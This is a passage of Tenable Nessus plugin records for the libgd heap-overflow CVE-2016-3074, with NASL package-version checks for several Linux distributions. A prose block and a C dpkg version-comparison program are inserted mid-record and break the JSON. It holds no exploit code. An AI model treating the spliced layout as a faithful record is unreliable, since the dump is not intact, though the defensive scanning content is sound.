Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1321893\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/183724.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ba22b825\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:24\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^24([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 24.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC24\", reference:\"gd-2.1.1-7.fc24\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T09:49:34", "description": "Hans Jerry Illikainen discovered that libgd2, a library for\nprogrammatic graphics creation and manipulation, suffers of a\nsignedness vulnerability which may result in a heap overflow when\nprocessing specially crafted compressed gd2 data. 
A remote attacker\ncan take advantage of this flaw to cause an application using the\nlibgd2 library to crash, or potentially, to execute arbitrary code\nwith the privileges of the user running the application.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-04-25T00:00:00", "title": "Debian DSA-3556-1 : libgd2 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-04-25T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:libgd2", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3556.NASL", "href": "https://www.tenable.com/plugins/nessus/90688", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3556. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90688);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"DSA\", value:\"3556\");\n\n script_name(english:\"Debian DSA-3556-1 : libgd2 - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Hans Jerry Illikainen discovered that libgd2, a library for\nprogrammatic graphics creation and manipulation, suffers of a\nsignedness vulnerability which may result in a heap overflow when\nprocessing specially crafted compressed gd2 data. 
A remote attacker\ncan take advantage of this flaw to cause an application using the\nlibgd2 library to crash, or potentially, to execute arbitrary code\nwith the privileges of the user running the application.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=822242\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/libgd2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/libgd2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3556\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libgd2 packages.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 2.0.36~rc1~dfsg-6.1+deb7u2.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 2.1.0-5+deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libgd2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/04/25\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"libgd-tools\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-noxpm\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-noxpm-dev\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-xpm\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libgd2-xpm-dev\", reference:\"2.0.36~rc1~dfsg-6.1+deb7u2\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd-dbg\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd-dev\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd-tools\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd2-noxpm-dev\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd2-xpm-dev\", reference:\"2.1.0-5+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"libgd3\", reference:\"2.1.0-5+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, 
\"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:14:25", "description": "Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 18, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-14T00:00:00", "title": "Fedora 22 : gd (2016-7d6cbcadca)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-07-14T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:gd", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-7D6CBCADCA.NASL", "href": "https://www.tenable.com/plugins/nessus/92118", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2016-7d6cbcadca.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92118);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"FEDORA\", value:\"2016-7d6cbcadca\");\n\n script_name(english:\"Fedora 22 : gd (2016-7d6cbcadca)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security fix for CVE-2016-3074\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without 
introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2016-7d6cbcadca\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected gd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"gd-2.1.1-3.fc22\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gd\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T09:10:52", "description": "New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-05-02T00:00:00", "title": "Slackware 14.0 / 14.1 / current : php (SSA:2016-120-02)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3074"], "modified": "2016-05-02T00:00:00", 
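The plugins collected here (deb_check, rpm_check, ubuntu_check, slackware_check) decide exposure by one thing only: whether the installed package version sorts below the fixed version named in the advisory. That comparison must follow the distribution's own ordering, not plain string order. In dpkg's scheme a '~' sorts before anything, including the end of the string, so 2.0.36~rc1~dfsg is older than 2.0.36, while +deb7u2 is newer than +deb7u1 and an epoch such as 1: outranks everything after it. The program below is an added example written for this page, not Tenable's or dpkg's code; it re-implements that ordering so the same check can be run from a shell without Nessus. The fixed versions are the ones quoted from DSA-3556 and USN-2987-1 above; the "installed" versions in main() are constructed sample data.

```c
/*
 * Added example: dpkg-style version ordering (epoch, upstream version,
 * Debian revision; '~' sorts before everything, even end of string),
 * re-implemented so the libgd fixed-version checks on this page can be
 * reproduced without a scanner.  Not dpkg's or Tenable's code.
 */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Collation weight of one character: digits 0, letters as-is, '~' below all. */
static int order(unsigned char c)
{
    if (isdigit(c)) return 0;
    if (isalpha(c)) return c;
    if (c == '~')   return -1;
    if (c)          return c + 256;
    return 0;
}

/* Compare two version fragments as alternating non-digit / digit runs. */
static int verrevcmp(const char *a, const char *b)
{
    while (*a || *b) {
        int first_diff = 0;
        while ((*a && !isdigit((unsigned char)*a)) || (*b && !isdigit((unsigned char)*b))) {
            int ac = order((unsigned char)*a), bc = order((unsigned char)*b);
            if (ac != bc) return ac - bc;   /* also triggers when one side has ended */
            a++; b++;
        }
        while (*a == '0') a++;              /* leading zeros are insignificant */
        while (*b == '0') b++;
        while (isdigit((unsigned char)*a) && isdigit((unsigned char)*b)) {
            if (!first_diff) first_diff = *a - *b;
            a++; b++;
        }
        if (isdigit((unsigned char)*a)) return 1;   /* longer numeric run wins */
        if (isdigit((unsigned char)*b)) return -1;
        if (first_diff) return first_diff;
    }
    return 0;
}

struct debver { long epoch; char upstream[96]; char revision[64]; };

static void copy_span(char *dst, size_t cap, const char *src, size_t n)
{
    if (n >= cap) n = cap - 1;
    memcpy(dst, src, n);
    dst[n] = '\0';
}

/* Split "[epoch:]upstream[-revision]"; the last '-' starts the revision. */
static void parse_version(const char *v, struct debver *out)
{
    const char *colon = strchr(v, ':');
    const char *dash;
    out->epoch = 0;
    if (colon) { out->epoch = strtol(v, NULL, 10); v = colon + 1; }
    dash = strrchr(v, '-');
    if (dash) {
        copy_span(out->upstream, sizeof out->upstream, v, (size_t)(dash - v));
        copy_span(out->revision, sizeof out->revision, dash + 1, strlen(dash + 1));
    } else {
        copy_span(out->upstream, sizeof out->upstream, v, strlen(v));
        out->revision[0] = '\0';
    }
}

/* <0, 0, >0 like strcmp, but with dpkg semantics. */
int dpkg_compare(const char *a, const char *b)
{
    struct debver va, vb;
    int r;
    parse_version(a, &va);
    parse_version(b, &vb);
    if (va.epoch != vb.epoch) return va.epoch < vb.epoch ? -1 : 1;
    r = verrevcmp(va.upstream, vb.upstream);
    if (r) return r;
    return verrevcmp(va.revision, vb.revision);
}

/* 1 if the installed version is still below the advisory's fixed version. */
int still_vulnerable(const char *installed, const char *fixed)
{
    return dpkg_compare(installed, fixed) < 0;
}

int main(void)
{
    /* Constructed installed versions, checked against fixed versions from DSA-3556 / USN-2987-1. */
    static const struct { const char *pkg, *installed, *fixed; } checks[] = {
        { "libgd3 (jessie)",     "2.1.0-5",                    "2.1.0-5+deb8u1" },
        { "libgd2-xpm (wheezy)", "2.0.36~rc1~dfsg-6.1+deb7u1", "2.0.36~rc1~dfsg-6.1+deb7u2" },
        { "libgd3 (xenial)",     "2.1.1-4ubuntu0.16.04.1",     "2.1.1-4ubuntu0.16.04.1" },
    };
    for (size_t i = 0; i < sizeof checks / sizeof checks[0]; i++)
        printf("%-22s %-28s %s\n", checks[i].pkg, checks[i].installed,
               still_vulnerable(checks[i].installed, checks[i].fixed) ? "VULNERABLE" : "ok");
    return 0;
}
```

A package-version check covers only the copy of the library the distribution ships. The Slackware advisory on this page delivers the fix in the php package, because PHP carries its own copy of gd; a host can therefore run a patched libgd and still expose the bug through a consumer that bundles or statically links the library, and the scan has to look at those consumers too.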
"cpe": ["cpe:/o:slackware:slackware_linux:14.1", "cpe:/o:slackware:slackware_linux:14.0", "p-cpe:/a:slackware:slackware_linux:php", "cpe:/o:slackware:slackware_linux"], "id": "SLACKWARE_SSA_2016-120-02.NASL", "href": "https://www.tenable.com/plugins/nessus/90801", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Slackware Security Advisory 2016-120-02. The text \n# itself is copyright (C) Slackware Linux, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90801);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2016-3074\");\n script_xref(name:\"SSA\", value:\"2016-120-02\");\n\n script_name(english:\"Slackware 14.0 / 14.1 / current : php (SSA:2016-120-02)\");\n script_summary(english:\"Checks for updated package in /var/log/packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Slackware host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"New php packages are available for Slackware 14.0, 14.1, and -current\nto fix security issues.\"\n );\n # http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.383127\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?60fc95e1\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:slackware:slackware_linux:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:slackware:slackware_linux:14.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Slackware Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Slackware/release\", \"Host/Slackware/packages\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"slackware.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Slackware/release\")) audit(AUDIT_OS_NOT, \"Slackware\");\nif (!get_kb_item(\"Host/Slackware/packages\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Slackware\", cpu);\n\n\nflag = 0;\nif (slackware_check(osver:\"14.0\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"i486\", pkgnum:\"1_slack14.0\")) flag++;\nif (slackware_check(osver:\"14.0\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.0\")) flag++;\n\nif (slackware_check(osver:\"14.1\", pkgname:\"php\", 
pkgver:\"5.6.21\", pkgarch:\"i486\", pkgnum:\"1_slack14.1\")) flag++;\nif (slackware_check(osver:\"14.1\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"x86_64\", pkgnum:\"1_slack14.1\")) flag++;\n\nif (slackware_check(osver:\"current\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"i586\", pkgnum:\"1\")) flag++;\nif (slackware_check(osver:\"current\", arch:\"x86_64\", pkgname:\"php\", pkgver:\"5.6.21\", pkgarch:\"x86_64\", pkgnum:\"1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:slackware_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T11:05:15", "description": "The remote host is affected by the vulnerability described in GLSA-201607-04\n(GD: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in GD. Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 24, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-07-18T00:00:00", "title": "GLSA-201607-04 : GD: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9709", "CVE-2016-3074", "CVE-2014-2497"], "modified": "2016-07-18T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:gd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201607-04.NASL", "href": "https://www.tenable.com/plugins/nessus/92348", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201607-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and 
licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92348);\n script_version(\"2.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-2497\", \"CVE-2014-9709\", \"CVE-2016-3074\");\n script_xref(name:\"GLSA\", value:\"201607-04\");\n\n script_name(english:\"GLSA-201607-04 : GD: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201607-04\n(GD: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in GD. 
Please review the\n CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the process, or cause a Denial of Service condition.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201607-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All GD users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=media-libs/gd-2.2.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:gd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"media-libs/gd\", unaffected:make_list(\"ge 2.2.2\"), vulnerable:make_list(\"lt 2.2.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"GD\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T09:01:27", "description": "According to the versions of the gd package installed, the EulerOS\ninstallation on the remote host is affected by the 